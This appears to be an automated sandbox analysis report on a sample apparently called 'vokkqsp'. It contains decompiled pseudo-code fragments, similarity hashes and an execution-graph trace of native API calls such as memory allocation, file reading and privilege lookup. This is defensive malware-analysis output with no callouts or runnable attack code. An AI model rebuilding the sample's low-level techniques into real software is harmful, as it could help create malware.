                                                      Function 00401D6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401D6F() {
				intOrPtr _v38;
				short _v40;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct tagPD _v72;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t23;
				void* _t24;

				E00403D00(_t24,  &_v72, 0, 0x42);
				_t14 =  *0x44cf04; // 0x0
				_v68 = _t14;
				_v64 =  *0x44e0ec;
				_v60 =  *0x44e0f0;
				_t17 =  *0x44cf00; // 0x0
				_v38 = _t17;
				_v72 = 0x42;
				_v40 = 1;
				_v52 = 0x40;
				PrintDlgW( &_v72);
				 *0x44e0ec = _v64;
				_t23 = _v60;
				 *0x44e0f0 = _t23;
				return _t23;
			}














                                                      0x00401d7d
                                                      0x00401d82
                                                      0x00401d8a
                                                      0x00401d92
                                                      0x00401d9a
                                                      0x00401d9d
                                                      0x00401da2
                                                      0x00401da8
                                                      0x00401daf
                                                      0x00401db7
                                                      0x00401dbe
                                                      0x00401dc7
                                                      0x00401dcc
                                                      0x00401dcf
                                                      0x00401dd7

                                                      APIs
                                                      • PrintDlgW.COMDLG32(00000042), ref: 00401DBE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Print
                                                      • String ID: @$B
                                                      • API String ID: 3558298466-3873543624
                                                      • Opcode ID: 2cf4c75701cb66347560561bb5252a442bb0f739d995148a1c3d7694e69de995
                                                      • Instruction ID: 253eb8d495a284d28f071347de1513ae55e13a5b5cecf8d6f97c033e715fa440
                                                      • Opcode Fuzzy Hash: 2cf4c75701cb66347560561bb5252a442bb0f739d995148a1c3d7694e69de995
                                                      • Instruction Fuzzy Hash: 7E01C9B8D012189FCB40DFA9E881B8DBBF8BB09704F00413AFA18E3350E77569158F59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E00401418(intOrPtr __ecx) {
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				signed int _v64;
				intOrPtr _v88;
				struct tagOFNA _v92;
				signed int _t12;
				void* _t16;
				intOrPtr _t17;
				signed int _t18;

				_t17 = __ecx;
				E00403D00(_t16,  &_v92, 0, 0x58);
				_v88 = _t17;
				_v92 = 0x58;
				_t18 = L"output.prn";
				_v40 = 0x806;
				_v64 = _t18;
				_v60 = 0x104;
				_v32 = L"prn";
				_t12 = GetSaveFileNameW( &_v92);
				asm("sbb eax, eax");
				return  ~_t12 & _t18;
			}













                                                      0x00401424
                                                      0x00401429
                                                      0x00401431
                                                      0x00401437
                                                      0x0040143e
                                                      0x00401443
                                                      0x0040144a
                                                      0x0040144e
                                                      0x00401455
                                                      0x0040145c
                                                      0x00401464
                                                      0x0040146c

                                                      APIs
                                                      • GetSaveFileNameW.COMDLG32(?), ref: 0040145C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FileNameSave
                                                      • String ID: X$output.prn
                                                      • API String ID: 1917019420-3723476453
                                                      • Opcode ID: 81484adba988873fd80313cae7800892f5692f0ec32502c2687beb841ae587c5
                                                      • Instruction ID: b9ee8c6855b88bc6d624417e1fe50689698af1f1e13dcf762283228afad99cd2
                                                      • Opcode Fuzzy Hash: 81484adba988873fd80313cae7800892f5692f0ec32502c2687beb841ae587c5
                                                      • Instruction Fuzzy Hash: 23F05EB1D4025C5BDB009FD0EC4A78EBFB8DB00715F00406AE904BB280E7B8491C8BC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:4.3%
                                                      Dynamic/Decrypted Code Coverage:2.6%
                                                      Signature Coverage:4.7%
                                                      Total number of Nodes:643
                                                      Total number of Limit Nodes:77
                                                      execution_graph 30781 420133 30784 41e813 30781->30784 30789 41f243 30784->30789 30786 41e82f 30793 aa9a00 LdrInitializeThunk 30786->30793 30787 41e84a 30790 41f2c8 30789->30790 30792 41f252 30789->30792 30790->30786 30792->30790 30794 419603 30792->30794 30793->30787 30795 41961d 30794->30795 30796 419611 30794->30796 30795->30790 30796->30795 30799 419a83 LdrLoadDll 30796->30799 30798 41976f 30798->30790 30799->30798 30800 40b4e3 30801 40b508 30800->30801 30806 40cf23 30801->30806 30805 40b560 30807 40cf47 30806->30807 30808 40cf83 LdrLoadDll 30807->30808 30809 40b53b 30807->30809 30808->30809 30809->30805 30810 40eae3 30809->30810 30811 40eb0f 30810->30811 30821 41e473 30811->30821 30814 40eb2f 30814->30805 30816 40eb52 30816->30814 30833 41eaa3 LdrLoadDll 30816->30833 30818 40eb6a 30834 41e723 30818->30834 30820 40eb8d 30820->30805 30822 41f243 LdrLoadDll 30821->30822 30823 40eb28 30822->30823 30823->30814 30824 41e4b3 30823->30824 30825 41e4cf 30824->30825 30826 41f243 LdrLoadDll 30824->30826 30837 aa9710 LdrInitializeThunk 30825->30837 30826->30825 30827 41e4ea 30827->30816 30828 41f243 LdrLoadDll 30827->30828 30829 41e50f 30828->30829 30838 aa9910 LdrInitializeThunk 30829->30838 30830 41e52e 30830->30816 30833->30818 30835 41f243 LdrLoadDll 30834->30835 30836 41e73f NtClose 30835->30836 30836->30820 30837->30827 30838->30830 30839 4017b3 30840 40176e 30839->30840 30842 4017b6 30839->30842 30844 423343 30840->30844 30847 41fc73 30844->30847 30848 41fc99 30847->30848 30861 40beb3 30848->30861 30850 41fca5 30851 40179e 30850->30851 30869 4100e3 30850->30869 30853 41fcc4 30854 41fcd7 30853->30854 30881 4100a3 30853->30881 30857 41fcec 30854->30857 30890 41e943 30854->30890 30886 403513 30857->30886 30859 41fcfb 30860 41e943 2 API calls 30859->30860 30860->30851 30893 40be03 30861->30893 30863 40bec0 30864 40bec7 30863->30864 30905 40bda3 30863->30905 30864->30850 30870 41010f 30869->30870 31299 40d3f3 30870->31299 30872 410121 31303 40ffb3 30872->31303 30875 410154 30878 410165 30875->30878 30880 41e723 2 API calls 30875->30880 30876 41013c 30877 410147 30876->30877 30879 41e723 2 API calls 30876->30879 30877->30853 30878->30853 30879->30877 30880->30878 30882 4100c2 30881->30882 30883 419603 LdrLoadDll 30881->30883 30884 4100c9 30882->30884 30885 4100cb GetUserGeoID 30882->30885 30883->30882 30884->30854 30885->30854 30887 40356a 30886->30887 30889 403577 30887->30889 31323 40dd83 30887->31323 30889->30859 30891 41f243 LdrLoadDll 30890->30891 30892 41e962 ExitProcess 30891->30892 30892->30857 30925 41cec3 30893->30925 30897 40be29 30897->30863 30898 40be1f 30898->30897 30932 41f5c3 30898->30932 30900 40be66 30900->30897 30943 40bc43 30900->30943 30902 40be86 30949 40b6a3 LdrLoadDll 30902->30949 30904 40be98 30904->30863 30906 40bdab 30905->30906 31280 41f8b3 30906->31280 30909 41f8b3 LdrLoadDll 30910 40bdd4 30909->30910 30911 41f8b3 LdrLoadDll 30910->30911 30912 40bded 30911->30912 30913 40fea3 30912->30913 30914 40febc 30913->30914 31284 40d273 30914->31284 30916 40fecf 30917 41e473 LdrLoadDll 30916->30917 30918 40fede 30917->30918 30919 40bed8 30918->30919 31288 41ea63 30918->31288 30919->30850 30921 40fef5 30922 40ff20 30921->30922 31291 41e4f3 30921->31291 30924 41e723 2 API calls 30922->30924 30924->30919 30926 41ced2 30925->30926 30927 419603 LdrLoadDll 30926->30927 30928 40be16 30927->30928 30929 41cd83 30928->30929 30930 41cd98 30929->30930 30950 41e893 LdrLoadDll 30929->30950 30930->30898 30933 41f5dc 30932->30933 30951 4191f3 30933->30951 30935 41f5f4 30936 41f5fd 30935->30936 30990 41f403 30935->30990 30936->30900 30938 41f611 30938->30936 31007 41e193 30938->31007 30940 41f645 31012 420173 30940->31012 31258 409433 30943->31258 30945 40bc64 30945->30902 30946 40bc5d 30946->30945 31271 4096f3 30946->31271 30949->30904 30950->30930 30952 419536 30951->30952 30953 419207 30951->30953 30952->30935 30953->30952 31015 41dee3 30953->31015 30956 419338 31018 41e5f3 30956->31018 30957 41931b 31075 41e6f3 LdrLoadDll 30957->31075 30960 419325 30960->30935 30961 41935f 30962 420173 2 API calls 30961->30962 30963 41936b 30962->30963 30963->30960 30964 4194fa 30963->30964 30966 419510 30963->30966 30970 419403 30963->30970 30965 41e723 2 API calls 30964->30965 30967 419501 30965->30967 31081 418f13 LdrLoadDll NtReadFile NtClose 30966->31081 30967->30935 30969 419523 30969->30935 30971 41946a 30970->30971 30973 419412 30970->30973 30971->30964 30972 41947d 30971->30972 31077 41e573 30972->31077 30975 419417 30973->30975 30976 41942b 30973->30976 31076 418dd3 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 30975->31076 30979 419430 30976->30979 30980 419448 30976->30980 31021 418e73 30979->31021 30980->30967 31033 418b93 30980->31033 30983 419421 30983->30935 30984 41943e 30984->30935 30986 4194dd 30988 41e723 2 API calls 30986->30988 30987 419460 30987->30935 30989 4194e9 30988->30989 30989->30935 30991 41f41e 30990->30991 30992 41f430 30991->30992 30993 41f450 30991->30993 31100 4200f3 30991->31100 30992->30938 31103 4187f3 30993->31103 30996 41f473 30996->30992 30997 4187f3 3 API calls 30996->30997 30998 41f495 30997->30998 30998->30992 31128 419b53 30998->31128 31000 41f51d 31001 41f52d 31000->31001 31224 41f1c3 LdrLoadDll 31000->31224 31139 41f033 31001->31139 31004 41f55b 31218 41e153 31004->31218 31006 41f585 31006->30938 31008 41e1af 31007->31008 31009 41f243 LdrLoadDll 31007->31009 31251 aa967a 31008->31251 31009->31008 31010 41e1ca 31010->30940 31254 41e903 31012->31254 31014 41f66f 31014->30900 31016 4192ec 31015->31016 31017 41f243 LdrLoadDll 31015->31017 31016->30956 31016->30957 31016->30960 31017->31016 31019 41f243 LdrLoadDll 31018->31019 31020 41e60f NtCreateFile 31019->31020 31020->30961 31022 418e8f 31021->31022 31023 41e573 LdrLoadDll 31022->31023 31024 418eb0 31023->31024 31025 418eb7 31024->31025 31026 418ecb 31024->31026 31027 41e723 2 API calls 31025->31027 31028 41e723 2 API calls 31026->31028 31029 418ec0 31027->31029 31030 418ed4 31028->31030 31029->30984 31082 420293 LdrLoadDll RtlAllocateHeap 31030->31082 31032 418edf 31032->30984 31034 418bde 31033->31034 31039 418c11 31033->31039 31035 41e573 LdrLoadDll 31034->31035 31037 418bf9 31035->31037 31036 418d5c 31038 41e573 LdrLoadDll 31036->31038 31040 41e723 2 API calls 31037->31040 31045 418d77 31038->31045 31039->31036 31041 418c2d 31039->31041 31042 418c02 31040->31042 31043 41e573 LdrLoadDll 31041->31043 31042->30987 31044 418c48 31043->31044 31047 418c64 31044->31047 31048 418c4f 31044->31048 31095 41e5b3 LdrLoadDll 31045->31095 31049 418c69 31047->31049 31050 418c7f 31047->31050 31052 41e723 2 API calls 31048->31052 31053 41e723 2 API calls 31049->31053 31061 418c84 31050->31061 31083 420253 31050->31083 31051 418db1 31054 41e723 2 API calls 31051->31054 31055 418c58 31052->31055 31056 418c72 31053->31056 31057 418dbc 31054->31057 31055->30987 31056->30987 31057->30987 31060 418cea 31062 418d01 31060->31062 31094 41e533 LdrLoadDll 31060->31094 31068 418c96 31061->31068 31086 41e6a3 31061->31086 31064 418d08 31062->31064 31065 418d1d 31062->31065 31066 41e723 2 API calls 31064->31066 31067 41e723 2 API calls 31065->31067 31066->31068 31069 418d26 31067->31069 31068->30987 31070 418d52 31069->31070 31089 41ff73 31069->31089 31070->30987 31072 418d3d 31073 420173 2 API calls 31072->31073 31074 418d46 31073->31074 31074->30987 31075->30960 31076->30983 31078 41f243 LdrLoadDll 31077->31078 31079 4194c5 31078->31079 31080 41e5b3 LdrLoadDll 31079->31080 31080->30986 31081->30969 31082->31032 31096 41e8c3 31083->31096 31085 42026b 31085->31061 31087 41f243 LdrLoadDll 31086->31087 31088 41e6bf NtReadFile 31087->31088 31088->31060 31090 41ff80 31089->31090 31091 41ff97 31089->31091 31090->31091 31092 420253 2 API calls 31090->31092 31091->31072 31093 41ffae 31092->31093 31093->31072 31094->31062 31095->31051 31097 41e8d8 31096->31097 31098 41f243 LdrLoadDll 31097->31098 31099 41e8df RtlAllocateHeap 31098->31099 31099->31085 31101 420120 31100->31101 31225 41e7d3 31100->31225 31101->30993 31104 418804 31103->31104 31105 41880c 31103->31105 31104->30996 31127 418adf 31105->31127 31228 4212f3 31105->31228 31107 418860 31108 4212f3 2 API calls 31107->31108 31112 41886b 31108->31112 31109 4188b9 31111 4212f3 2 API calls 31109->31111 31113 4188cd 31111->31113 31112->31109 31233 421393 31112->31233 31114 4212f3 2 API calls 31113->31114 31115 418940 31114->31115 31116 4212f3 2 API calls 31115->31116 31124 418988 31116->31124 31118 418ab7 31240 421353 LdrLoadDll RtlFreeHeap 31118->31240 31120 418ac1 31241 421353 LdrLoadDll RtlFreeHeap 31120->31241 31122 418acb 31242 421353 LdrLoadDll RtlFreeHeap 31122->31242 31239 421353 LdrLoadDll RtlFreeHeap 31124->31239 31125 418ad5 31243 421353 LdrLoadDll RtlFreeHeap 31125->31243 31127->30996 31129 419b64 31128->31129 31130 4191f3 8 API calls 31129->31130 31135 419b7a 31130->31135 31131 419b83 31131->31000 31132 419bba 31133 420173 2 API calls 31132->31133 31134 419bcb 31133->31134 31134->31000 31135->31131 31135->31132 31136 419c06 31135->31136 31137 420173 2 API calls 31136->31137 31138 419c0b 31137->31138 31138->31000 31140 41f047 31139->31140 31141 41eec3 LdrLoadDll 31139->31141 31244 41eec3 31140->31244 31141->31140 31143 41f050 31144 41eec3 LdrLoadDll 31143->31144 31145 41f059 31144->31145 31146 41eec3 LdrLoadDll 31145->31146 31147 41f062 31146->31147 31148 41eec3 LdrLoadDll 31147->31148 31149 41f06b 31148->31149 31150 41eec3 LdrLoadDll 31149->31150 31151 41f074 31150->31151 31152 41eec3 LdrLoadDll 31151->31152 31153 41f080 31152->31153 31154 41eec3 LdrLoadDll 31153->31154 31155 41f089 31154->31155 31156 41eec3 LdrLoadDll 31155->31156 31157 41f092 31156->31157 31158 41eec3 LdrLoadDll 31157->31158 31159 41f09b 31158->31159 31160 41eec3 LdrLoadDll 31159->31160 31161 41f0a4 31160->31161 31162 41eec3 LdrLoadDll 31161->31162 31163 41f0ad 31162->31163 31164 41eec3 LdrLoadDll 31163->31164 31165 41f0b9 31164->31165 31166 41eec3 LdrLoadDll 31165->31166 31167 41f0c2 31166->31167 31168 41eec3 LdrLoadDll 31167->31168 31169 41f0cb 31168->31169 31170 41eec3 LdrLoadDll 31169->31170 31171 41f0d4 31170->31171 31172 41eec3 LdrLoadDll 31171->31172 31173 41f0dd 31172->31173 31174 41eec3 LdrLoadDll 31173->31174 31175 41f0e6 31174->31175 31176 41eec3 LdrLoadDll 31175->31176 31177 41f0f2 31176->31177 31178 41eec3 LdrLoadDll 31177->31178 31179 41f0fb 31178->31179 31180 41eec3 LdrLoadDll 31179->31180 31181 41f104 31180->31181 31182 41eec3 LdrLoadDll 31181->31182 31183 41f10d 31182->31183 31184 41eec3 LdrLoadDll 31183->31184 31185 41f116 31184->31185 31186 41eec3 LdrLoadDll 31185->31186 31187 41f11f 31186->31187 31188 41eec3 LdrLoadDll 31187->31188 31189 41f12b 31188->31189 31190 41eec3 LdrLoadDll 31189->31190 31191 41f134 31190->31191 31192 41eec3 LdrLoadDll 31191->31192 31193 41f13d 31192->31193 31194 41eec3 LdrLoadDll 31193->31194 31195 41f146 31194->31195 31196 41eec3 LdrLoadDll 31195->31196 31197 41f14f 31196->31197 31198 41eec3 LdrLoadDll 31197->31198 31199 41f158 31198->31199 31200 41eec3 LdrLoadDll 31199->31200 31201 41f164 31200->31201 31202 41eec3 LdrLoadDll 31201->31202 31203 41f16d 31202->31203 31204 41eec3 LdrLoadDll 31203->31204 31205 41f176 31204->31205 31206 41eec3 LdrLoadDll 31205->31206 31207 41f17f 31206->31207 31208 41eec3 LdrLoadDll 31207->31208 31209 41f188 31208->31209 31210 41eec3 LdrLoadDll 31209->31210 31211 41f191 31210->31211 31212 41eec3 LdrLoadDll 31211->31212 31213 41f19d 31212->31213 31214 41eec3 LdrLoadDll 31213->31214 31215 41f1a6 31214->31215 31216 41eec3 LdrLoadDll 31215->31216 31217 41f1af 31216->31217 31217->31004 31219 41e159 31218->31219 31220 41f243 LdrLoadDll 31219->31220 31221 41e16f 31220->31221 31250 aa9860 LdrInitializeThunk 31221->31250 31222 41e186 31222->31006 31224->31001 31226 41e7ef NtAllocateVirtualMemory 31225->31226 31227 41f243 LdrLoadDll 31225->31227 31226->31101 31227->31226 31229 421303 31228->31229 31230 421309 31228->31230 31229->31107 31231 420253 2 API calls 31230->31231 31232 42132f 31231->31232 31232->31107 31234 4213b8 31233->31234 31236 4213f0 31233->31236 31235 420253 2 API calls 31234->31235 31237 4213cd 31235->31237 31236->31112 31238 420173 2 API calls 31237->31238 31238->31236 31239->31118 31240->31120 31241->31122 31242->31125 31243->31127 31245 41eede 31244->31245 31246 419603 LdrLoadDll 31245->31246 31247 41eefe 31246->31247 31248 419603 LdrLoadDll 31247->31248 31249 41efb2 31247->31249 31248->31249 31249->31143 31249->31249 31250->31222 31252 aa968f LdrInitializeThunk 31251->31252 31253 aa9681 31251->31253 31252->31010 31253->31010 31255 41f243 LdrLoadDll 31254->31255 31256 41e91f RtlFreeHeap 31255->31256 31256->31014 31259 409443 31258->31259 31260 40943e 31258->31260 31261 4200f3 2 API calls 31259->31261 31260->30946 31264 409468 31261->31264 31262 4094cb 31262->30946 31263 41e153 2 API calls 31263->31264 31264->31262 31264->31263 31265 4094d1 31264->31265 31270 4200f3 2 API calls 31264->31270 31274 41e853 31264->31274 31267 4094f7 31265->31267 31268 41e853 2 API calls 31265->31268 31267->30946 31269 4094e8 31268->31269 31269->30946 31270->31264 31272 41e853 2 API calls 31271->31272 31273 409711 31272->31273 31273->30902 31275 41f243 LdrLoadDll 31274->31275 31276 41e86f 31275->31276 31279 aa96e0 LdrInitializeThunk 31276->31279 31277 41e886 31277->31264 31279->31277 31281 41f8d6 31280->31281 31282 40cf23 LdrLoadDll 31281->31282 31283 40bdc0 31282->31283 31283->30909 31285 40d296 31284->31285 31287 40d313 31285->31287 31297 41df23 LdrLoadDll 31285->31297 31287->30916 31289 41f243 LdrLoadDll 31288->31289 31290 41ea82 LookupPrivilegeValueW 31289->31290 31290->30921 31292 41e509 31291->31292 31293 41f243 LdrLoadDll 31292->31293 31294 41e50f 31293->31294 31298 aa9910 LdrInitializeThunk 31294->31298 31295 41e52e 31295->30922 31297->31287 31298->31295 31300 40d41a 31299->31300 31301 40d273 LdrLoadDll 31300->31301 31302 40d47d 31301->31302 31302->30872 31304 40ffcd 31303->31304 31312 410083 31303->31312 31305 40d273 LdrLoadDll 31304->31305 31306 40ffef 31305->31306 31313 41e1d3 31306->31313 31308 410031 31309 410077 31308->31309 31316 41e213 31308->31316 31311 41e723 2 API calls 31309->31311 31311->31312 31312->30875 31312->30876 31314 41e1ef 31313->31314 31315 41f243 LdrLoadDll 31313->31315 31314->31308 31315->31314 31317 41e229 31316->31317 31318 41f243 LdrLoadDll 31317->31318 31319 41e22f 31318->31319 31322 aa9fe0 LdrInitializeThunk 31319->31322 31320 41e246 31320->31309 31322->31320 31324 40ddae 31323->31324 31325 40d3f3 LdrLoadDll 31324->31325 31326 40de05 31325->31326 31359 40d073 31326->31359 31328 40e07c 31328->30889 31329 40de2b 31329->31328 31368 418b23 31329->31368 31331 40de70 31331->31328 31372 40a063 31331->31372 31333 40deb4 31333->31328 31394 41e793 31333->31394 31337 40df0a 31338 40df11 31337->31338 31406 41e2a3 31337->31406 31339 420173 2 API calls 31338->31339 31341 40df1e 31339->31341 31341->30889 31343 40df5b 31344 420173 2 API calls 31343->31344 31345 40df62 31344->31345 31345->30889 31346 40df6b 31347 410173 3 API calls 31346->31347 31348 40dfdf 31347->31348 31348->31338 31349 40dfea 31348->31349 31350 420173 2 API calls 31349->31350 31351 40e00e 31350->31351 31411 41e2f3 31351->31411 31354 41e2a3 2 API calls 31355 40e049 31354->31355 31355->31328 31416 41e0b3 31355->31416 31358 41e943 2 API calls 31358->31328 31360 40d080 31359->31360 31361 40d084 31359->31361 31360->31329 31362 40d09d 31361->31362 31363 40d0cf 31361->31363 31421 41df63 LdrLoadDll 31362->31421 31422 41df63 LdrLoadDll 31363->31422 31365 40d0e0 31365->31329 31367 40d0bf 31367->31329 31369 418b31 31368->31369 31370 410173 3 API calls 31369->31370 31371 418b49 31370->31371 31371->31331 31423 40a293 31372->31423 31374 40a081 31375 409433 4 API calls 31374->31375 31376 40a15f 31374->31376 31379 40a289 31374->31379 31387 40a0bf 31375->31387 31377 40a23f 31376->31377 31376->31379 31380 409433 4 API calls 31376->31380 31377->31379 31470 4103e3 10 API calls 31377->31470 31379->31333 31391 40a19c 31380->31391 31381 40a253 31381->31379 31471 4103e3 10 API calls 31381->31471 31383 40a269 31383->31379 31472 4103e3 10 API calls 31383->31472 31385 40a27f 31385->31333 31387->31376 31388 40a155 31387->31388 31437 409d43 31387->31437 31389 4096f3 2 API calls 31388->31389 31389->31376 31390 409d43 14 API calls 31390->31391 31391->31377 31391->31390 31392 40a235 31391->31392 31393 4096f3 2 API calls 31392->31393 31393->31377 31395 41f243 LdrLoadDll 31394->31395 31396 41e7af 31395->31396 31554 aa98f0 LdrInitializeThunk 31396->31554 31397 40deeb 31399 410173 31397->31399 31400 410190 31399->31400 31555 41e253 31400->31555 31403 4101d8 31403->31337 31404 41e2a3 2 API calls 31405 410201 31404->31405 31405->31337 31407 41f243 LdrLoadDll 31406->31407 31408 41e2bf 31407->31408 31561 aa9780 LdrInitializeThunk 31408->31561 31409 40df4e 31409->31343 31409->31346 31412 41f243 LdrLoadDll 31411->31412 31413 41e30f 31412->31413 31562 aa97a0 LdrInitializeThunk 31413->31562 31414 40e022 31414->31354 31417 41f243 LdrLoadDll 31416->31417 31418 41e0cf 31417->31418 31563 aa9a20 LdrInitializeThunk 31418->31563 31419 40e075 31419->31358 31421->31367 31422->31365 31424 40a2ba 31423->31424 31425 409433 4 API calls 31424->31425 31432 40a51f 31424->31432 31426 40a30d 31425->31426 31427 4096f3 2 API calls 31426->31427 31426->31432 31428 40a39c 31427->31428 31429 409433 4 API calls 31428->31429 31428->31432 31430 40a3b1 31429->31430 31431 4096f3 2 API calls 31430->31431 31430->31432 31435 40a411 31431->31435 31432->31374 31433 409433 4 API calls 31433->31435 31434 409d43 14 API calls 31434->31435 31435->31432 31435->31433 31435->31434 31436 4096f3 2 API calls 31435->31436 31436->31435 31438 409d68 31437->31438 31473 41dfa3 31438->31473 31441 409dbc 31441->31387 31442 409e3d 31506 4102c3 LdrLoadDll NtClose 31442->31506 31443 41e193 2 API calls 31444 409de0 31443->31444 31444->31442 31445 409deb 31444->31445 31447 409e69 31445->31447 31476 40e093 31445->31476 31447->31387 31448 409e58 31450 409e75 31448->31450 31451 409e5f 31448->31451 31507 41e023 LdrLoadDll 31450->31507 31452 41e723 2 API calls 31451->31452 31452->31447 31453 409e05 31453->31447 31496 409b73 31453->31496 31455 409ea0 31457 40e093 5 API calls 31455->31457 31459 409ec0 31457->31459 31459->31447 31508 41e053 LdrLoadDll 31459->31508 31461 409ee5 31509 41e0e3 LdrLoadDll 31461->31509 31463 409eff 31464 41e0b3 2 API calls 31463->31464 31465 409f0e 31464->31465 31466 41e723 2 API calls 31465->31466 31467 409f18 31466->31467 31510 409943 31467->31510 31469 409f2c 31469->31387 31470->31381 31471->31383 31472->31385 31474 409db2 31473->31474 31475 41f243 LdrLoadDll 31473->31475 31474->31441 31474->31442 31474->31443 31475->31474 31478 40e0c1 31476->31478 31477 410173 3 API calls 31479 40e123 31477->31479 31478->31477 31480 40e16c 31479->31480 31481 41e2a3 2 API calls 31479->31481 31480->31453 31482 40e14e 31481->31482 31483 40e158 31482->31483 31487 40e178 31482->31487 31484 41e2f3 2 API calls 31483->31484 31485 40e162 31484->31485 31486 41e723 2 API calls 31485->31486 31486->31480 31488 40e202 31487->31488 31489 40e1e5 31487->31489 31490 41e2f3 2 API calls 31488->31490 31491 41e723 2 API calls 31489->31491 31492 40e211 31490->31492 31493 40e1ef 31491->31493 31494 41e723 2 API calls 31492->31494 31493->31453 31495 40e21b 31494->31495 31495->31453 31498 409b89 31496->31498 31497 409d14 31497->31387 31498->31497 31526 409733 31498->31526 31500 409c88 31500->31497 31501 409943 11 API calls 31500->31501 31502 409cb6 31501->31502 31502->31497 31503 41e193 2 API calls 31502->31503 31504 409ceb 31503->31504 31504->31497 31505 41e793 2 API calls 31504->31505 31505->31497 31506->31448 31507->31455 31508->31461 31509->31463 31511 40996c 31510->31511 31533 4098a3 31511->31533 31514 41e793 2 API calls 31515 40997f 31514->31515 31515->31514 31516 409a0a 31515->31516 31518 409a05 31515->31518 31541 410343 31515->31541 31516->31469 31517 41e723 2 API calls 31519 409a3d 31517->31519 31518->31517 31519->31516 31520 41dfa3 LdrLoadDll 31519->31520 31521 409aa2 31520->31521 31521->31516 31545 41dfe3 31521->31545 31523 409b06 31523->31516 31524 4191f3 8 API calls 31523->31524 31525 409b5b 31524->31525 31525->31469 31527 409832 31526->31527 31528 409748 31526->31528 31527->31500 31528->31527 31529 4191f3 8 API calls 31528->31529 31531 4097b5 31529->31531 31530 4097dc 31530->31500 31531->31530 31532 420173 2 API calls 31531->31532 31532->31530 31534 4098bd 31533->31534 31535 40cf23 LdrLoadDll 31534->31535 31536 4098d8 31535->31536 31537 419603 LdrLoadDll 31536->31537 31538 4098f0 31537->31538 31539 40990c 31538->31539 31540 4098f9 PostThreadMessageW 31538->31540 31539->31515 31540->31539 31542 410356 31541->31542 31548 41e123 31542->31548 31546 41dfff 31545->31546 31547 41f243 LdrLoadDll 31545->31547 31546->31523 31547->31546 31549 41e13f 31548->31549 31550 41f243 LdrLoadDll 31548->31550 31553 aa9840 LdrInitializeThunk 31549->31553 31550->31549 31551 410381 31551->31515 31553->31551 31554->31397 31556 41e26f 31555->31556 31557 41f243 LdrLoadDll 31555->31557 31560 aa99a0 LdrInitializeThunk 31556->31560 31557->31556 31558 4101d1 31558->31403 31558->31404 31560->31558 31561->31409 31562->31414 31563->31419 31566 aa9540 LdrInitializeThunk

                                                      Executed Functions

                                                      Function 0041E7CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 41e7cd-41e810 call 41f243 NtAllocateVirtualMemory
                                                      C-Code - Quality: 100%
                                                      			E0041E7CD(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;

				_t10 = _v0;
				E0041F243( *((intOrPtr*)(_v0 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}





                                                      0x0041e7d6
                                                      0x0041e7ea
                                                      0x0041e80c
                                                      0x0041e810

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID: ($
                                                      • API String ID: 2167126740-1917586925
                                                      • Opcode ID: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                      • Instruction ID: 75c01ba8265e86b6e799f606f6827c4ef4659bfb27b3c208fb82fe6623ca5877
                                                      • Opcode Fuzzy Hash: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                      • Instruction Fuzzy Hash: 63F015B6210208BBCB14DF89DC81EEB77ADAF88754F118159BE08A7241C630FD11CBB4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E5ED Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
